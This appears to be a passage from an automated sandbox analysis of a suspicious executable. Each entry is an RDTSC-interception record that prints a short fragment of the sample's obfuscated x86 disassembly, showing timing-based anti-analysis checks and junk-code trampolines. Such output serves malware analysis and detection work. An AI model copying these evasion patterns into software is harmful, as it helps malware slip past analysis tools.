Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EBC second address: 5E5F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FA6C4D39088h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov si, 8300h 0x00000029 push 00000000h 0x0000002b jo 00007FA6C4D3908Ch 0x00000031 xor dword ptr [ebp+122D25B2h], eax 0x00000037 mov dword ptr [ebp+122D1D33h], eax 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jl 00007FA6C4D39086h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5F07 second address: 5E5F15 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E68F2 second address: 5E68F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E66C2 second address: 5E66D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E68F6 second address: 5E68FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E66D3 second address: 5E66F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007FA6C4C2AB48h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E68FD second address: 5E690E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jp 00007FA6C4D39094h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E66F6 second address: 5E66FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E66FA second address: 5E66FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E7BDB second address: 5E7BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E8610 second address: 5E8614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E7BDF second address: 5E7BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC134 second address: 5EC13E instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EE4CC second address: 5EE4D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC877 second address: 5EC88F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D39094h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EE66A second address: 5EE66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EE66F second address: 5EE683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D39090h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0483 second address: 5F0496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FA6C4C2AB36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0496 second address: 5F049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F049A second address: 5F04A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F04A0 second address: 5F04A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F0609 second address: 5F0623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB46h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F2703 second address: 5F270F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F270F second address: 5F2714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F2714 second address: 5F277E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, ebx 0x0000000c pushad 0x0000000d add ecx, dword ptr [ebp+122D2879h] 0x00000013 and ecx, 3B939F16h 0x00000019 popad 0x0000001a push 00000000h 0x0000001c jmp 00007FA6C4D39094h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007FA6C4D39088h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d ja 00007FA6C4D3908Bh 0x00000043 xchg eax, esi 0x00000044 push ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F277E second address: 5F2782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F18A6 second address: 5F18AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F37DA second address: 5F37E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA6C4C2AB36h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F486C second address: 5F4872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F4872 second address: 5F4878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F39C5 second address: 5F39D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA6C4D39086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F4878 second address: 5F487C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F788D second address: 5F7891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7891 second address: 5F7897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7897 second address: 5F78B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D39098h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F78B3 second address: 5F78B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F78B7 second address: 5F7923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FA6C4D39088h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D2482h] 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c push eax 0x0000002d mov si, di 0x00000030 pop edi 0x00000031 mov dword ptr [ebp+12466642h], ebx 0x00000037 popad 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007FA6C4D39088h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 push eax 0x00000055 jng 00007FA6C4D3908Eh 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8800 second address: 5F8805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8805 second address: 5F882E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4D39088h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d clc 0x0000000e push 00000000h 0x00000010 mov bx, D57Eh 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D2761h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jno 00007FA6C4D39088h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F69A6 second address: 5F6A5B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jc 00007FA6C4C2AB36h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 ja 00007FA6C4C2AB3Ch 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f popad 0x00000020 nop 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FA6C4C2AB38h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b xor edi, dword ptr [ebp+122D203Bh] 0x00000041 push dword ptr fs:[00000000h] 0x00000048 jc 00007FA6C4C2AB3Ch 0x0000004e add ebx, dword ptr [ebp+12458BC6h] 0x00000054 mov edi, 59213997h 0x00000059 mov dword ptr fs:[00000000h], esp 0x00000060 mov eax, dword ptr [ebp+122D0135h] 0x00000066 sub dword ptr [ebp+122D31C7h], esi 0x0000006c push FFFFFFFFh 0x0000006e mov dword ptr [ebp+122D2040h], edi 0x00000074 nop 0x00000075 pushad 0x00000076 jmp 00007FA6C4C2AB43h 0x0000007b jmp 00007FA6C4C2AB49h 0x00000080 popad 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 pushad 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6A5B second address: 5F6A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7B02 second address: 5F7B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6A61 second address: 5F6A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F97CF second address: 5F9821 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA6C4C2AB44h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, ecx 0x0000000f push 00000000h 0x00000011 and bh, FFFFFF81h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FA6C4C2AB38h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 pushad 0x00000031 stc 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push eax 0x00000038 pop eax 0x00000039 pop eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F7B0D second address: 5F7B74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, 3ABFh 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov edi, dword ptr [ebp+122D29C5h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 add edi, dword ptr [ebp+122D181Eh] 0x00000026 mov eax, dword ptr [ebp+122D0B0Dh] 0x0000002c jmp 00007FA6C4D39094h 0x00000031 push FFFFFFFFh 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FA6C4D39088h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d cmc 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FA732 second address: 5FA736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F99F8 second address: 5F99FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F99FE second address: 5F9A03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FA7C4 second address: 5FA7C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F9A03 second address: 5F9A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FA6C4C2AB40h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FA7C8 second address: 5FA7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB6A2 second address: 5FB6A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB6A7 second address: 5FB6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D39096h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FA6C4D3908Bh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FA8E5 second address: 5FA8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB6D4 second address: 5FB776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 jng 00007FA6C4D3908Ch 0x0000000d mov dword ptr [ebp+122D1D40h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FA6C4D39088h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f pushad 0x00000030 mov ecx, dword ptr [ebp+122D2875h] 0x00000036 mov dword ptr [ebp+1247D194h], edi 0x0000003c popad 0x0000003d mov dword ptr [ebp+122D2752h], ecx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007FA6C4D39088h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f mov edi, edx 0x00000061 pushad 0x00000062 jnp 00007FA6C4D3909Ch 0x00000068 mov dl, bl 0x0000006a popad 0x0000006b xchg eax, esi 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007FA6C4D3908Dh 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB776 second address: 5FB77A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A1EAF second address: 5A1EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 605E76 second address: 605ED4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FA6C4C2AB43h 0x00000010 pop ebx 0x00000011 jmp 00007FA6C4C2AB43h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA6C4C2AB46h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 605ED4 second address: 605ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60601B second address: 60603B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA6C4C2AB36h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA6C4C2AB3Ch 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60603B second address: 606046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6061B2 second address: 6061B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6061B6 second address: 6061BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6061BC second address: 6061C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60633B second address: 606355 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4D39086h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FA6C4D39086h 0x00000014 jno 00007FA6C4D39086h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 606355 second address: 60635F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60635F second address: 60636F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007FA6C4D39086h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4D39 second address: 5E4D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C3CE second address: 60C3E5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4D3908Ch 0x00000008 jg 00007FA6C4D39086h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C3E5 second address: 60C3EF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C3EF second address: 60C3F9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4D3908Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C3F9 second address: 60C428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jnp 00007FA6C4C2AB40h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007FA6C4C2AB36h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FA6C4C2AB36h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FCAF second address: 60FCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA6C4D39086h 0x0000000a jmp 00007FA6C4D3908Fh 0x0000000f popad 0x00000010 jmp 00007FA6C4D39095h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FCE3 second address: 60FCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB3Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60FCF6 second address: 60FD12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39092h 0x00000007 jne 00007FA6C4D3908Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610430 second address: 610434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6105D7 second address: 6105EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39094h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610764 second address: 61076A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61076A second address: 61078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA6C4D39096h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61078B second address: 610790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6108E8 second address: 6108EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 610A6E second address: 610AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jng 00007FA6C4C2AB36h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA6C4C2AB49h 0x0000001f rdtsc
